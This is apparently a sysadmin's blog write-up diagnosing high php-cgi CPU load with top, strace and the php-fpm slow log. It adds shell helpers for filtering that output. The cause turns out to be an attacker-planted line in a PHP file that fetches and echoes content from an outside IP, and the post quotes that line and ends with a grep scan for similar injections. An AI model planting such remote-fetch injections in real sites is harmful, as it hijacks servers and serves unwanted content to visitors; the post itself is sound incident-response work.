Troubleshooting 100% CPU usage by php-cgi on Linux

First, a word about our website's architecture. Traffic is not very high at present, but because the company plans to promote the site soon, we moved from a single machine to an nginx front end that load-balances across two web servers. All web pages and static files are shared over NFS, with the NFS service installed on one of the two web servers, and the back end uses MySQL in master-slave mode. It is a very typical architecture.

Only 2 days after switching to this architecture, I received a Nagios alert reporting that one of the web servers had a high load. I logged in to the server with SecureCRT, ran top, and found several php-cgi processes consuming a large amount of CPU:

13889 www    25  0 228m 14m 9344 S 100.4 0.1 14:51.22 php-cgi
13882 www    25  0 227m 13m 9284 S 100.1 0.1 10:53.18 php-cgi
13924 www    25  0 227m 9936 5732 S 100.1 0.1 23:20.80 php-cgi
13927 www    25  0 226m 5228 2064 R 100.1 0.0 24:44.24 php-cgi
13827 www    25  0 228m 15m 10m R 99.7 0.1 12:57.60 php-cgi
13900 www    25  0 228m 19m 13m R 99.7 0.1  9:03.09 php-cgi
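
Picking the busy processes out of a long top listing by eye gets tedious, so here is a minimal sketch of a filter for it. The function name hot_procs and the threshold are illustrative assumptions, not part of the original investigation, and the filter assumes the usual top column order (PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND).

```shell
#!/bin/sh
# hot_procs MIN_CPU NAME   (hypothetical helper, not from the original post)
# Reads top-style process lines on stdin and prints "PID %CPU TIME+" for each
# process whose command is NAME and whose %CPU is at least MIN_CPU.
# Assumed columns: PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
hot_procs() {
  awk -v min="$1" -v name="$2" '
    # Skip header lines: only rows that start with a numeric PID are processes.
    $1 ~ /^[0-9]+$/ && $12 == name && ($9 + 0) >= min { print $1, $9, $11 }
  '
}

# On a live system, one batch-mode iteration of top can be piped in:
#   top -b -n 1 | hot_procs 90 php-cgi
```

Fed the six lines above, this would list all six PIDs, since each sits at roughly 100% CPU.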

The output above shows that these php-cgi processes not only use a large amount of CPU but have also been running for a very long time. Normally a php-cgi process receives a request, handles it quickly, and is released, so why were these few still running after so long? To see what one of these long-running processes was doing, we ran ls -l /proc/13827/fd/, with the following result:

lrwx------ 1 www www 64 Dec 11 12:03 0 -> socket:[68444030]
l-wx------ 1 www www 64 Dec 11 12:03 1 -> pipe:[68444057]
l-wx------ 1 www www 64 Dec 11 12:03 2 -> pipe:[68444058]
lrwx------ 1 www www 64 Dec 11 12:03 3 -> socket:[68468225]
lrwx------ 1 www www 64 Dec 11 12:03 4 -> socket:[68469788]
lrwx------ 1 www www 64 Dec 11 12:03 5 -> socket:[68457928]
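
When a process has many descriptors, a quick count by type makes the same point as reading the listing line by line. The following is a small sketch under that assumption; fd_summary is a hypothetical helper name, and it only looks at the link target printed after "->".

```shell
#!/bin/sh
# fd_summary   (hypothetical helper, not from the original post)
# Reads the output of `ls -l /proc/PID/fd` on stdin and counts descriptors by
# the kind of object they point to: sockets, pipes, and everything else
# (regular files, devices, anon inodes).
fd_summary() {
  awk '
    # Only symlink lines of the form "... N -> target" are of interest.
    NF >= 3 && $(NF - 1) == "->" {
      target = $NF
      if (target ~ /^socket:/)    kind = "socket"
      else if (target ~ /^pipe:/) kind = "pipe"
      else                        kind = "other"
      count[kind]++
    }
    END {
      printf "socket=%d pipe=%d other=%d\n", count["socket"], count["pipe"], count["other"]
    }
  '
}

# On a live system:
#   ls -l /proc/13827/fd/ | fd_summary
```

For the listing above this would report four sockets, two pipes, and nothing else, which matches the observation that no regular files are open.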

There were no open files and no write activity, only sockets and pipes, so the process did not appear to be doing much, which was quite strange. Next we used strace to trace what the process was doing.

strace -p 13827
poll([{fd=4, events=POLLIN}], 1, 0) = 0 (Timeout)
select(5, [4], [4], [], {15, 0}) = 1 (out [4], left {15, 0})
poll([{fd=4, events=POLLIN}], 1, 0) = 0 (Timeout)
select(5, [4], [4], [], {15, 0}) = 1 (out [4], left {15, 0})
poll([{fd=4, events=POLLIN}], 1, 0) = 0 (Timeout)
select(5, [4], [4], [], {15, 0}) = 1 (out [4], left {15, 0})
poll([{fd=4, events=POLLIN}], 1, 0) = 0 (Timeout)
select(5, [4], [4], [], {15, 0}) = 1 (out [4], left {15, 0})
poll([{fd=4, events=POLLIN}], 1, 0) = 0 (Timeout)
select(5, [4], [4], [], {15, 0}) = 1 (out [4], left {15, 0})
poll([{fd=4, events=POLLIN}], 1, 0) = 0 (Timeout)
select(5, [4], [4], [], {15, 0}) = 1 (out [4], left {15, 0})
poll([{fd=4, events=POLLIN}], 1, 0) = 0 (Timeout)
......
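
A repeating pattern like this is easier to confirm with a tally than by scrolling. The sketch below counts system calls in saved strace output and separates those that ended in "(Timeout)". The name syscall_tally and the file /tmp/trace.txt are assumptions for illustration, and the parser expects plain strace lines of the form name(args) = result.

```shell
#!/bin/sh
# syscall_tally   (hypothetical helper, not from the original post)
# Reads strace output on stdin and prints "COUNT SYSCALL OUTCOME", most
# frequent first. OUTCOME is "timeout" when the line ends in "(Timeout)",
# otherwise "other".
syscall_tally() {
  awk '
    # A syscall line starts with the call name followed by "(".
    match($0, /^[a-z_0-9]+\(/) {
      name = substr($0, 1, RLENGTH - 1)
      outcome = ($0 ~ /\(Timeout\)$/) ? "timeout" : "other"
      tally[name " " outcome]++
    }
    END { for (key in tally) print tally[key], key }
  ' | sort -k1,1nr -k2
}

# On a live system, capture a bounded sample first, then tally it:
#   timeout 10 strace -p 13827 -o /tmp/trace.txt
#   syscall_tally < /tmp/trace.txt
```

strace can also produce a per-call summary on its own with the -c option. The tally here is only meant to show how lopsided the mix of calls is.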

The trace shows that the process keeps timing out, but why? That called for a look at the timeout settings in php-fpm.conf, where the timeout turned out to be 0, meaning no timeout was configured. We decided to look for the problem in the cgi logs first: with the timeout in php-fpm.conf set to 5s, any php-cgi request that runs longer than 5s is recorded in PHP's slow log. The settings are as follows:

<value name="request_slowlog_timeout">3s</value>
<value name="slowlog">logs/slow.log</value>

With the settings in place, we restarted php-fpm with /usr/local/php/sbin/php-fpm restart. After a while, slow.log contained many entries like the following:

script_filename = /data/htdocs/bbs.hrloo.com/apl.php
[0x00007fffb060fd70] file_get_contents() /data/htdocs/bbs.hrloo.com/apl.php:10
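
With many entries in the slow log, it helps to count which call site shows up most often. The following sketch does that under two assumptions: each entry has a script_filename line followed by stack frames in the format shown above, and the first frame after script_filename is the innermost call. The name slowlog_hotspots is hypothetical.

```shell
#!/bin/sh
# slowlog_hotspots   (hypothetical helper, not from the original post)
# Reads a php-fpm slow log on stdin and prints "COUNT FUNCTION FILE:LINE" for
# the first stack frame of every entry, most frequent first.
slowlog_hotspots() {
  awk '
    # Each entry announces the script, then lists frames as "[0x...] func() file:line".
    /^script_filename = / { want_frame = 1; next }
    want_frame && /^\[0x[0-9a-f]+\] / {
      count[$2 " " $3]++
      want_frame = 0          # only the first frame of each entry is counted
    }
    END { for (site in count) print count[site], site }
  ' | sort -k1,1nr -k2
}

# On a live system (the log path depends on the slowlog setting):
#   slowlog_hotspots < logs/slow.log
```

If one function at one file and line dominates the output, that line is the first place to look.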

Line 10 of /data/htdocs/bbs.hrloo.com/apl.php reads:

echo file_get_contents('http://121.10.108.227:86/yh.asp');

Searching online for notes on this PHP function, I found that when the remote site responds slowly, file_get_contents() can hang without timing out while CPU usage stays very high. Visiting the link in that line showed that it points to a novel website: our site had been attacked and this code planted in the file. After the file was restored, everything returned to normal. Oddly, the web server that hosts NFS did not have this problem. Presumably the remote site was slow to begin with and access through NFS made things slower still, which triggered the fault. In a way we should thank this fault, because without it we would not have discovered such a serious problem.

The fault has been fixed, but the underlying problem is far from solved. The key is to find out how the file was modified, so that similar incidents cannot happen again. It looks like there is still a lot to do. Haha!
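
One modest starting point for that follow-up is to check whether other PHP files contain the same kind of injected remote fetch. The sketch below is only an assumption about how such a scan could look: find_remote_fetches is a hypothetical name, the pattern covers only the literal form seen in apl.php, and obfuscated code would slip past it.

```shell
#!/bin/sh
# find_remote_fetches DIR   (hypothetical helper, not from the original post)
# Recursively lists "file:line:text" for PHP files under DIR that call
# file_get_contents() with a literal http:// or https:// URL.
find_remote_fetches() {
  grep -rnE --include='*.php' "file_get_contents\(['\"]https?://" "$1"
}

# On a live system, for example against the document root:
#   find_remote_fetches /data/htdocs
# Files changed in the last 7 days can be listed separately with:
#   find /data/htdocs -name '*.php' -mtime -7
```

Some hits will be legitimate, so each one still needs to be reviewed by hand.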
